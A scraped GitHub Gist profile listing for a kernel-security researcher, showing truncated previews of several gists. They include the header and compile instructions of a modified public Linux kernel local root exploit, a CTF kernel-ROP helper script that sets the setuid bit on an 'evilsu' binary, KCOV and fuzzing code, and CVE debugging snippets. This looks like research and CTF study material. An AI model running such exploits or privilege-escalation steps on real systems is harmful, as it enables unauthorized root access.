Bonan Ruan (brant-ruan)
Don't scream
// gcc -o test_kcov test_kcov.c -static
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
// KCOV IOCTL definitions
@brant-ruan
brant-ruan / exploit.c
Created September 13, 2022 16:19
https://www.grsecurity.net/~spender/exploits/cheddar_bay/exploit.c, modified by Bonan to run on Ubuntu 9.10 with recompiled 2.6.31 kernel
/* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun
A vulnerability which, when viewed at the source level, is unexploitable!
But which, thanks to gcc optimizations, becomes exploitable :)
Also, bypass of mmap_min_addr via SELinux vulnerability!
(where having SELinux enabled actually increases your risk against a
large class of kernel vulnerabilities)
for 2.6.30 without SELinux enabled, compile with:
cc -fPIC -fno-stack-protector -shared -o exploit.so exploit.c
(on a 64bit system -m64 may be necessary to compile a 64bit .so)
@brant-ruan
brant-ruan / evil
Last active July 2, 2024 18:37
[exploit_bypass_kpti_with_coredump] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with coredump; no KASLR
#!/bin/sh
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu
#!/bin/bash
if [ "$(id -u)" -ne 0 ]; then
echo "This script must be run as root. Please use 'sudo' to run it."
exit 1
fi
if [ $# -eq 0 ]; then
echo "Usage: $0 <version>"
exit 1
fi
@brant-ruan
brant-ruan / auth.c
Created February 18, 2024 14:26
CVE-2018-1000028 - debugging fs/nfsd/auth.c
int nfsd_setuser(struct svc_rqst *rqstp, struct svc_export *exp)
{
struct group_info *rqgi;
struct group_info *gi;
struct cred *new;
int i, j;
int flags = nfsexp_flags(rqstp, exp);
validate_process_creds();
/* CGI decoding as C program */
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
int hex_values[256];
void init_hex_values() {
Location = Tuple[str, int]
class Coverage:
"""Track coverage within a `with` block. Use as
```
with Coverage() as cov:
function_to_be_traced()
c = cov.coverage()
```
"""
@brant-ruan
brant-ruan / tfb_cgi_decode.py
Created October 28, 2023 13:29
The Fuzzing Book - cgi_decode.py
def cgi_decode(s: str) -> str:
"""Decode the CGI-encoded string `s`:
* replace '+' by ' '
* replace "%xx" by the character with hex number xx.
Return the decoded string. Raise `ValueError` for invalid inputs."""
# Mapping of hex digits to their integer values
hex_values = {
'0': 0, '1': 1, '2': 2, '3': 3, '4': 4,
'5': 5, '6': 6, '7': 7, '8': 8, '9': 9,
#!/bin/bash
# Decompress a .cpio.gz packed file system
rm -rf ./initramfs && mkdir initramfs
pushd . && pushd initramfs
cp ../initramfs.cpio.gz .
gzip -dc initramfs.cpio.gz | cpio -idm &>/dev/null && rm initramfs.cpio.gz
popd
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <sys/mman.h>